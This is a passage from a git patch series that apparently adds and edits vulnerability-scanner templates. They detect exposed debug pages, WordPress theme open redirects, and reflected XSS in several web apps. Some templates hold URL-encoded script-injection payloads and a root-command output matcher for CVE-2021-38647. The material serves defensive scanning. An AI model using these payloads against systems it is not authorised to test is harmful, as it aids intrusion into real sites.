insertions(+) create mode 100644 exposures/logs/php-warning.yaml diff --git a/exposures/logs/php-warning.yaml b/exposures/logs/php-warning.yaml new file mode 100644 index 0000000000..3c452bdb59 --- /dev/null +++ b/exposures/logs/php-warning.yaml @@ -0,0 +1,23 @@ +id: php-warning + +info: + name: PHP warning + author: dhiyaneshDK + severity: low + reference: https://www.shodan.io/search?query=http.title%3A%22PHP+warning%22 + tags: exposure,php,debug + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'PHP warning' + + - type: status + status: + - 500 From 4959b99a7ddb9028364ba0bffb92a31de71cf275 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 17 Sep 2021 08:11:38 +0530 Subject: [PATCH 2362/4083] Create zabbix-error.yaml --- exposures/logs/zabbix-error.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposures/logs/zabbix-error.yaml diff --git a/exposures/logs/zabbix-error.yaml b/exposures/logs/zabbix-error.yaml new file mode 100644 index 0000000000..f3d7dabdfb --- /dev/null +++ b/exposures/logs/zabbix-error.yaml @@ -0,0 +1,23 @@ +id: zabbix-error + +info: + name: Zabbix Error + author: dhiyaneshDK + severity: low + reference: https://www.shodan.io/search?query=http.title%3A%22Warning+%5Brefreshed+every+30+sec.%5D%22 + tags: exposure,zabbix,debug + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Warning [refreshed every 30 sec.]' + + - type: status + status: + - 200 From 8554474fd209c86dee7bbc87a1ffd84227584972 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 17 Sep 2021 08:14:18 +0530 Subject: [PATCH 2363/4083] Create database-error.yaml --- exposures/logs/database-error.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposures/logs/database-error.yaml diff --git a/exposures/logs/database-error.yaml b/exposures/logs/database-error.yaml new file mode 100644 index 0000000000..f926d64043 --- /dev/null +++ b/exposures/logs/database-error.yaml @@ -0,0 +1,23 @@ +id: database-error + +info: + name: Database Error + author: dhiyaneshDK + severity: low + reference: https://www.shodan.io/search?query=http.title%3A%22Database+Error%22 + tags: exposure,database,debug + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Database Error' + + - type: status + status: + - 500 From 5b9495b51cc40937bf58a149456ddc0e21eca911 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 17 Sep 2021 08:17:35 +0530 Subject: [PATCH 2364/4083] Create xampp-default-page.yaml --- technologies/xampp-default-page.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 technologies/xampp-default-page.yaml diff --git a/technologies/xampp-default-page.yaml b/technologies/xampp-default-page.yaml new file mode 100644 index 0000000000..a068364700 --- /dev/null +++ b/technologies/xampp-default-page.yaml @@ -0,0 +1,23 @@ +id: xampp-default-page + +info: + name: XAMPP Default Page + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22XAMPP%22&page=1 + tags: tech,php + +requests: + - method: GET + path: + - '{{BaseURL}}/dashboard/' + + matchers-condition: and + matchers: + - type: word + words: + - 'Welcome to XAMPP' + + - type: status + status: + - 200 From 24b40f5f5dcc3a465901bab83dc43131eb05be48 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 17 Sep 2021 08:19:28 +0530 Subject: [PATCH 2365/4083] Update phpinfo.yaml --- exposures/configs/phpinfo.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/exposures/configs/phpinfo.yaml b/exposures/configs/phpinfo.yaml index 7e135845c8..302451f3ff 100644 --- a/exposures/configs/phpinfo.yaml +++ b/exposures/configs/phpinfo.yaml @@ -2,7 +2,7 @@ id: phpinfo-files info: name: phpinfo Disclosure - author: pdteam,daffainfo,meme-lord + author: pdteam,daffainfo,meme-lord,dhiyaneshDK severity: low tags: config,exposure @@ -26,6 +26,7 @@ requests: - "{{BaseURL}}/infos.php" - "{{BaseURL}}/linusadmin-phpinfo.php" - "{{BaseURL}}/php-info.php" + - "{{BaseURL}}/dashboard/phpinfo.php" matchers-condition: and matchers: @@ -44,4 +45,4 @@ requests: part: body group: 1 regex: - - '>PHP Version <\/td>([0-9.]+)' \ No newline at end of file + - '>PHP Version <\/td>([0-9.]+)' From b9cb5a8d720b434aab117fa3738e72dbd91a36c4 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 17 Sep 2021 12:56:55 +0700 Subject: [PATCH 2366/4083] Update CVE-2021-38647.yaml --- cves/2021/CVE-2021-38647.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-38647.yaml b/cves/2021/CVE-2021-38647.yaml index 30a8785d89..9ebc3f374c 100644 --- a/cves/2021/CVE-2021-38647.yaml +++ b/cves/2021/CVE-2021-38647.yaml @@ -10,6 +10,7 @@ info: - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647 - https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647 + - https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/ - https://github.com/microsoft/omi requests: @@ -52,7 +53,7 @@ requests: matchers: - type: word words: - - "uid=0(root) gid=0(root) groups=0(root)" + - "uid=0(root) gid=0(root) groups=0(root)" part: body - type: status From a3ce6426f67cd3c07e4bed59d28417aa11e35000 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 17 Sep 2021 12:46:35 +0530 Subject: [PATCH 2367/4083] Update database-error.yaml --- exposures/logs/database-error.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/logs/database-error.yaml b/exposures/logs/database-error.yaml index f926d64043..d66676e6fd 100644 --- a/exposures/logs/database-error.yaml +++ b/exposures/logs/database-error.yaml @@ -3,7 +3,7 @@ id: database-error info: name: Database Error author: dhiyaneshDK - severity: low + severity: info reference: https://www.shodan.io/search?query=http.title%3A%22Database+Error%22 tags: exposure,database,debug From 1dc92b45566cb39ed3292116a5fe49b657b48133 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 17 Sep 2021 12:54:13 +0530 Subject: [PATCH 2368/4083] Update and rename technologies/xampp-default-page.yaml to technologies/apache/xampp-default-page.yaml --- technologies/{ => apache}/xampp-default-page.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{ => apache}/xampp-default-page.yaml (93%) diff --git a/technologies/xampp-default-page.yaml b/technologies/apache/xampp-default-page.yaml similarity index 93% rename from technologies/xampp-default-page.yaml rename to technologies/apache/xampp-default-page.yaml index a068364700..441789ee20 100644 --- a/technologies/xampp-default-page.yaml +++ b/technologies/apache/xampp-default-page.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.shodan.io/search?query=http.title%3A%22XAMPP%22&page=1 - tags: tech,php + tags: tech,php,xampp,apache requests: - method: GET From 317c941340187ebf1d958727e75510c6b73b2af5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 17 Sep 2021 12:59:34 +0530 Subject: [PATCH 2369/4083] Update php-errors.yaml --- misconfiguration/php-errors.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/php-errors.yaml b/misconfiguration/php-errors.yaml index 02bd1efcb3..df2a0c9ae2 100644 --- a/misconfiguration/php-errors.yaml +++ b/misconfiguration/php-errors.yaml @@ -1,4 +1,4 @@ -id: php_errors +id: php-errors info: name: PHP errors From 52162716e5be8bcc8b844aed86668ad6c381a212 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 17 Sep 2021 13:00:35 +0530 Subject: [PATCH 2370/4083] Update and rename exposures/logs/zabbix-error.yaml to misconfiguration/zabbix-error.yaml --- {exposures/logs => misconfiguration}/zabbix-error.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename {exposures/logs => misconfiguration}/zabbix-error.yaml (93%) diff --git a/exposures/logs/zabbix-error.yaml b/misconfiguration/zabbix-error.yaml similarity index 93% rename from exposures/logs/zabbix-error.yaml rename to misconfiguration/zabbix-error.yaml index f3d7dabdfb..8684bc36b5 100644 --- a/exposures/logs/zabbix-error.yaml +++ b/misconfiguration/zabbix-error.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: low reference: https://www.shodan.io/search?query=http.title%3A%22Warning+%5Brefreshed+every+30+sec.%5D%22 - tags: exposure,zabbix,debug + tags: zabbix,misconfig requests: - method: GET From 769a6ea0595afd37c9f5607ba0721385053f6dd0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 17 Sep 2021 13:01:57 +0530 Subject: [PATCH 2371/4083] Update zabbix-error.yaml --- misconfiguration/zabbix-error.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/zabbix-error.yaml b/misconfiguration/zabbix-error.yaml index 8684bc36b5..1948ae5dc0 100644 --- a/misconfiguration/zabbix-error.yaml +++ b/misconfiguration/zabbix-error.yaml @@ -3,7 +3,7 @@ id: zabbix-error info: name: Zabbix Error author: dhiyaneshDK - severity: low + severity: info reference: https://www.shodan.io/search?query=http.title%3A%22Warning+%5Brefreshed+every+30+sec.%5D%22 tags: zabbix,misconfig From 0b7c12951c2d42eec70bf38cbefea2da604167b7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 17 Sep 2021 13:13:40 +0530 Subject: [PATCH 2372/4083] Update php-warning.yaml --- exposures/logs/php-warning.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/exposures/logs/php-warning.yaml b/exposures/logs/php-warning.yaml index 3c452bdb59..51ee2cd270 100644 --- a/exposures/logs/php-warning.yaml +++ b/exposures/logs/php-warning.yaml @@ -12,11 +12,11 @@ requests: path: - '{{BaseURL}}' - matchers-condition: and + matchers-condition: or matchers: - - type: word - words: - - 'PHP warning' + - type: regex + regex: + - '(?m)^([a-z /A-Z.(0-9):]+)?PHP warning([a-z /A-Z.(0-9):]+)?<\/title>$' - type: status status: From 156daddde04aafc4f0985d8b9bc1189bb01e5fc4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 17 Sep 2021 13:20:06 +0530 Subject: [PATCH 2373/4083] Update phpinfo.yaml --- exposures/configs/phpinfo.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposures/configs/phpinfo.yaml b/exposures/configs/phpinfo.yaml index 7e135845c8..4284c21fb2 100644 --- a/exposures/configs/phpinfo.yaml +++ b/exposures/configs/phpinfo.yaml @@ -27,6 +27,7 @@ requests: - "{{BaseURL}}/linusadmin-phpinfo.php" - "{{BaseURL}}/php-info.php" + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -44,4 +45,4 @@ requests: part: body group: 1 regex: - - '>PHP Version <\/td>
    From 41c2076bf29c51b050c9ebef4d90f3e95f636831 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Fri, 17 Sep 2021 18:04:38 +0900 Subject: [PATCH 2380/4083] Create attitude-wp-theme-open-redirect.yaml --- attitude-wp-theme-open-redirect.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 attitude-wp-theme-open-redirect.yaml diff --git a/attitude-wp-theme-open-redirect.yaml b/attitude-wp-theme-open-redirect.yaml new file mode 100644 index 0000000000..b4071f7af7 --- /dev/null +++ b/attitude-wp-theme-open-redirect.yaml @@ -0,0 +1,19 @@ +id: attitude-wp-theme-open-redirect + +info: + name: WordPress Attitude Themes 1.1.1 Open Redirection + author: 0x_Akoko + reference: https://cxsecurity.com/issue/WLB-2020030185 + severity: low + tags: wp,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/themes/Attitude/go.php?https://example.com/" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header From d4ed75c33931dd031a2174804075bdef1520f78c Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Fri, 17 Sep 2021 18:06:58 +0900 Subject: [PATCH 2381/4083] Create eatery-restaurant-wp-theme-open-redirect.yaml --- eatery-restaurant-wp-theme-open-redirect.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 eatery-restaurant-wp-theme-open-redirect.yaml diff --git a/eatery-restaurant-wp-theme-open-redirect.yaml b/eatery-restaurant-wp-theme-open-redirect.yaml new file mode 100644 index 0000000000..0decf0cc13 --- /dev/null +++ b/eatery-restaurant-wp-theme-open-redirect.yaml @@ -0,0 +1,19 @@ +id: eatery-restaurant-wp-theme-open-redirect + +info: + name: WordPress Attitude Themes 1.1.1 Open Redirection + author: 0x_Akoko + reference: https://cxsecurity.com/issue/WLB-2020030183 + severity: low + tags: wp,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/themes/eatery/nav.php?-Menu-=https://example.com/" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header From 73e5d7d8dd222e0083ad98959f7b5e2ddeca7a5e Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Fri, 17 Sep 2021 18:09:25 +0900 Subject: [PATCH 2382/4083] Create weekender-newspaper-wp-theme-open-redirect.yaml --- ...nder-newspaper-wp-theme-open-redirect.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 weekender-newspaper-wp-theme-open-redirect.yaml diff --git a/weekender-newspaper-wp-theme-open-redirect.yaml b/weekender-newspaper-wp-theme-open-redirect.yaml new file mode 100644 index 0000000000..b047695b8a --- /dev/null +++ b/weekender-newspaper-wp-theme-open-redirect.yaml @@ -0,0 +1,19 @@ +id: weekender-newspaper-wp-theme-open-redirect + +info: + name: WordPress Attitude Themes 1.1.1 Open Redirection + author: 0x_Akoko + reference: https://cxsecurity.com/issue/WLB-2020040103 + severity: low + tags: wp,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/themes/weekender/friend.php?id=MTA0&link=aHR0cHM6Ly9leGFtcGxlLmNvbQ==" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header From 2e8329b645b003d7734ea325e3b8a4015ce74cbf Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 17 Sep 2021 15:06:13 +0530 Subject: [PATCH 2383/4083] Update and rename weekender-newspaper-wp-theme-open-redirect.yaml to vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml --- .../wordpress/weekender-newspaper-open-redirect.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) rename weekender-newspaper-wp-theme-open-redirect.yaml => vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml (73%) diff --git a/weekender-newspaper-wp-theme-open-redirect.yaml b/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml similarity index 73% rename from weekender-newspaper-wp-theme-open-redirect.yaml rename to vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml index b047695b8a..64d1b30634 100644 --- a/weekender-newspaper-wp-theme-open-redirect.yaml +++ b/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml @@ -1,11 +1,11 @@ -id: weekender-newspaper-wp-theme-open-redirect +id: weekender-newspaper-open-redirect info: - name: WordPress Attitude Themes 1.1.1 Open Redirection + name: WordPress Weekender Newspaper Themes 9.0 - Open Redirection author: 0x_Akoko - reference: https://cxsecurity.com/issue/WLB-2020040103 severity: low - tags: wp,redirect + reference: https://cxsecurity.com/issue/WLB-2020040103 + tags: wordpress,wp-plugin,redirect requests: - method: GET From c5ccf9d991401672409a3fc80bde2a5d55305ee9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 17 Sep 2021 15:08:59 +0530 Subject: [PATCH 2384/4083] Update and rename attitude-wp-theme-open-redirect.yaml to vulnerabilities/wordpress/attitude-theme-open-redirect.yaml --- .../wordpress/attitude-theme-open-redirect.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename attitude-wp-theme-open-redirect.yaml => vulnerabilities/wordpress/attitude-theme-open-redirect.yaml (86%) diff --git a/attitude-wp-theme-open-redirect.yaml b/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml similarity index 86% rename from attitude-wp-theme-open-redirect.yaml rename to vulnerabilities/wordpress/attitude-theme-open-redirect.yaml index b4071f7af7..c09a52922a 100644 --- a/attitude-wp-theme-open-redirect.yaml +++ b/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml @@ -1,11 +1,11 @@ -id: attitude-wp-theme-open-redirect +id: attitude-theme-open-redirect info: name: WordPress Attitude Themes 1.1.1 Open Redirection author: 0x_Akoko - reference: https://cxsecurity.com/issue/WLB-2020030185 severity: low - tags: wp,redirect + reference: https://cxsecurity.com/issue/WLB-2020030185 + tags: wordpress,wp-plugin,redirect requests: - method: GET From 69e546ea4dbd65bcbe9ef1ab394a50f03c718c5a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 17 Sep 2021 15:10:23 +0530 Subject: [PATCH 2385/4083] Update attitude-theme-open-redirect.yaml --- vulnerabilities/wordpress/attitude-theme-open-redirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml b/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml index c09a52922a..de51dfbd25 100644 --- a/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml +++ b/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml @@ -5,7 +5,7 @@ info: author: 0x_Akoko severity: low reference: https://cxsecurity.com/issue/WLB-2020030185 - tags: wordpress,wp-plugin,redirect + tags: wordpress,wp-theme,redirect requests: - method: GET From a40530d9d4a2276e1a14a61fa67dfc78c5571577 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 17 Sep 2021 15:10:30 +0530 Subject: [PATCH 2386/4083] Update and rename eatery-restaurant-wp-theme-open-redirect.yaml to vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml --- .../wordpress/eatery-restaurant-open-redirect.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename eatery-restaurant-wp-theme-open-redirect.yaml => vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml (85%) diff --git a/eatery-restaurant-wp-theme-open-redirect.yaml b/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml similarity index 85% rename from eatery-restaurant-wp-theme-open-redirect.yaml rename to vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml index 0decf0cc13..d649437101 100644 --- a/eatery-restaurant-wp-theme-open-redirect.yaml +++ b/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml @@ -1,11 +1,11 @@ -id: eatery-restaurant-wp-theme-open-redirect +id: eatery-restaurant-open-redirect info: name: WordPress Attitude Themes 1.1.1 Open Redirection author: 0x_Akoko - reference: https://cxsecurity.com/issue/WLB-2020030183 severity: low - tags: wp,redirect + reference: https://cxsecurity.com/issue/WLB-2020030183 + tags: wordpress,wp-theme,redirect requests: - method: GET From a725b8e0e5489bcf9e5b2778ab398d482dedd478 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 17 Sep 2021 15:13:45 +0530 Subject: [PATCH 2387/4083] Update CVE-2016-1000142.yaml --- cves/2016/CVE-2016-1000142.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/cves/2016/CVE-2016-1000142.yaml b/cves/2016/CVE-2016-1000142.yaml index b8a8b5e263..392b427d0d 100644 --- a/cves/2016/CVE-2016-1000142.yaml +++ b/cves/2016/CVE-2016-1000142.yaml @@ -4,7 +4,8 @@ info: name: MW Font Changer <= 4.2.5 - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: | + description: The MW Font Changer WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability. + reference: - https://wpscan.com/vulnerability/4ff5d65a-ba61-439d-ab7f-745a0648fccc - https://nvd.nist.gov/vuln/detail/CVE-2016-1000142 tags: cve,cve2016,wordpress,wp-plugin,xss @@ -12,13 +13,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - '"><"' + - '' part: body - type: word From 90e5aaf04a41f540861cdf96cd8e2063b51e7acc Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 17 Sep 2021 15:20:33 +0530 Subject: [PATCH 2388/4083] Update CVE-2021-38314.yaml --- cves/2021/CVE-2021-38314.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-38314.yaml b/cves/2021/CVE-2021-38314.yaml index 48326d830e..1b3b9d061b 100644 --- a/cves/2021/CVE-2021-38314.yaml +++ b/cves/2021/CVE-2021-38314.yaml @@ -4,9 +4,9 @@ info: name: Redux Framework - Unauthenticated Sensitive Information Disclosure author: meme-lord severity: medium - reference: | - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38314 + reference: - https://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38314 tags: cve,cve2021,wordpress requests: From d877a465c770045450e4f927f8bc6493d55804bd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 17 Sep 2021 09:53:01 +0000 Subject: [PATCH 2389/4083] Auto Generated CVE annotations [Fri Sep 17 09:53:01 UTC 2021] :robot: --- cves/2016/CVE-2016-1000142.yaml | 5 +++++ cves/2021/CVE-2021-24499.yaml | 5 +++++ 2 files changed, 10 insertions(+) diff --git a/cves/2016/CVE-2016-1000142.yaml b/cves/2016/CVE-2016-1000142.yaml index 392b427d0d..2d1df9a78d 100644 --- a/cves/2016/CVE-2016-1000142.yaml +++ b/cves/2016/CVE-2016-1000142.yaml @@ -9,6 +9,11 @@ info: - https://wpscan.com/vulnerability/4ff5d65a-ba61-439d-ab7f-745a0648fccc - https://nvd.nist.gov/vuln/detail/CVE-2016-1000142 tags: cve,cve2016,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000142 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24499.yaml b/cves/2021/CVE-2021-24499.yaml index b38bdac6ae..849ea2760c 100644 --- a/cves/2021/CVE-2021-24499.yaml +++ b/cves/2021/CVE-2021-24499.yaml @@ -9,6 +9,11 @@ info: - https://github.com/RyouYoo/CVE-2021-24499 - https://nvd.nist.gov/vuln/detail/CVE-2021-24499 tags: cve,cve2021,wordpress,wp-plugin,rce,intrusive + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-24499 + cwe-id: CWE-434 requests: - raw: From 92014aa363ad2b296d2dcbcf38bb3abbeac4ed01 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 17 Sep 2021 16:31:20 +0530 Subject: [PATCH 2390/4083] Update CVE-2020-19295.yaml --- cves/2020/CVE-2020-19295.yaml | 12 +++++------- 1 file changed, 5 insertions(+), 7 deletions(-) diff --git a/cves/2020/CVE-2020-19295.yaml b/cves/2020/CVE-2020-19295.yaml index 4c81f11efe..5cf36cf8cc 100644 --- a/cves/2020/CVE-2020-19295.yaml +++ b/cves/2020/CVE-2020-19295.yaml @@ -8,21 +8,19 @@ info: reference: - https://github.com/zchuanzhao/jeesns/issues/21 - https://nvd.nist.gov/vuln/detail/CVE-2020-19295 - tags: cves,cve2020,jeesns,xss + tags: cve,cve2020,jeesns,xss requests: - method: GET path: - - "{{BaseURL}}/weibo/topic/%3CScript%3Eprompt(document.domain)%3C/Script%3E" - headers: - Content-Type: application/x-www-form-urlencoded + - "{{BaseURL}}/weibo/topic/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - '' part: body - type: status @@ -30,6 +28,6 @@ requests: - 200 - type: word - words: - - 'Content-Type: text/html' part: header + words: + - text/html From ae221b789295b937d1b651b12762d70e9f14c43e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 17 Sep 2021 16:32:27 +0530 Subject: [PATCH 2391/4083] Update CVE-2020-19283.yaml --- cves/2020/CVE-2020-19283.yaml | 14 ++++++-------- 1 file changed, 6 insertions(+), 8 deletions(-) diff --git a/cves/2020/CVE-2020-19283.yaml b/cves/2020/CVE-2020-19283.yaml index 81024c60e6..16a136f1ca 100644 --- a/cves/2020/CVE-2020-19283.yaml +++ b/cves/2020/CVE-2020-19283.yaml @@ -4,25 +4,23 @@ info: name: Jeesns newVersion Reflection XSS author: pikpikcu severity: medium - description: reflected cross-site scripting (XSS) vulnerability in the /newVersion component of Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML. + description: Reflected cross-site scripting (XSS) vulnerability in the /newVersion component of Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML. reference: - https://github.com/zchuanzhao/jeesns/issues/10 - https://nvd.nist.gov/vuln/detail/CVE-2020-19283 - tags: cves,cve2020,jeesns,xss + tags: cve,cve2020,jeesns,xss requests: - method: GET path: - - "{{BaseURL}}/newVersion?callback=%3CScript%3Eprompt(document.domain)%3C/Script%3E" - headers: - Content-Type: application/x-www-form-urlencoded + - "{{BaseURL}}/newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - '" part: body - type: status @@ -30,6 +28,6 @@ requests: - 200 - type: word - words: - - 'Content-Type: text/html' part: header + words: + - text/html From 51672dd85da6a2bc0b3b85a66735914280760262 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 17 Sep 2021 16:32:41 +0530 Subject: [PATCH 2392/4083] Update CVE-2020-19295.yaml --- cves/2020/CVE-2020-19295.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-19295.yaml b/cves/2020/CVE-2020-19295.yaml index 5cf36cf8cc..0ec16465cd 100644 --- a/cves/2020/CVE-2020-19295.yaml +++ b/cves/2020/CVE-2020-19295.yaml @@ -4,7 +4,7 @@ info: name: Jeesns Weibo Topic Reflection XSS author: pikpikcu severity: medium - description: reflected cross-site scripting (XSS) vulnerability in Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. + description: Reflected cross-site scripting (XSS) vulnerability in Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. reference: - https://github.com/zchuanzhao/jeesns/issues/21 - https://nvd.nist.gov/vuln/detail/CVE-2020-19295 From 9357ac415368b99c49dced9b7874fce9f75c802c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 17 Sep 2021 16:33:45 +0530 Subject: [PATCH 2393/4083] Update CVE-2020-19282.yaml --- cves/2020/CVE-2020-19282.yaml | 16 +++++++--------- 1 file changed, 7 insertions(+), 9 deletions(-) diff --git a/cves/2020/CVE-2020-19282.yaml b/cves/2020/CVE-2020-19282.yaml index 5feb200bef..eaec870c63 100644 --- a/cves/2020/CVE-2020-19282.yaml +++ b/cves/2020/CVE-2020-19282.yaml @@ -1,28 +1,26 @@ id: CVE-2020-19282 info: - name: Jeesns 1.4.2 XSS + name: Jeesns 1.4.2 XSS author: pikpikcu severity: medium - description: reflected cross-site scripting (XSS) vulnerability in Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. + description: Reflected cross-site scripting (XSS) vulnerability in Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. reference: - https://github.com/zchuanzhao/jeesns/issues/11 - https://nvd.nist.gov/vuln/detail/CVE-2020-19282 - tags: cves,cve2020,jeesns,xss + tags: cve,cve2020,jeesns,xss requests: - method: GET path: - - "{{BaseURL}}/error?msg=%3CScript%3Eprompt(document.domain)%3C/Script%3E" - headers: - Content-Type: application/x-www-form-urlencoded + - "{{BaseURL}}/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - '' part: body - type: status @@ -30,6 +28,6 @@ requests: - 200 - type: word - words: - - 'Content-Type: text/html' part: header + words: + - text/html From a866f1e777cc9ffd969005754cb2ecf8f00a6f6c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 17 Sep 2021 11:08:30 +0000 Subject: [PATCH 2394/4083] Auto Generated CVE annotations [Fri Sep 17 11:08:30 UTC 2021] :robot: --- cves/2020/CVE-2020-19282.yaml | 5 +++++ 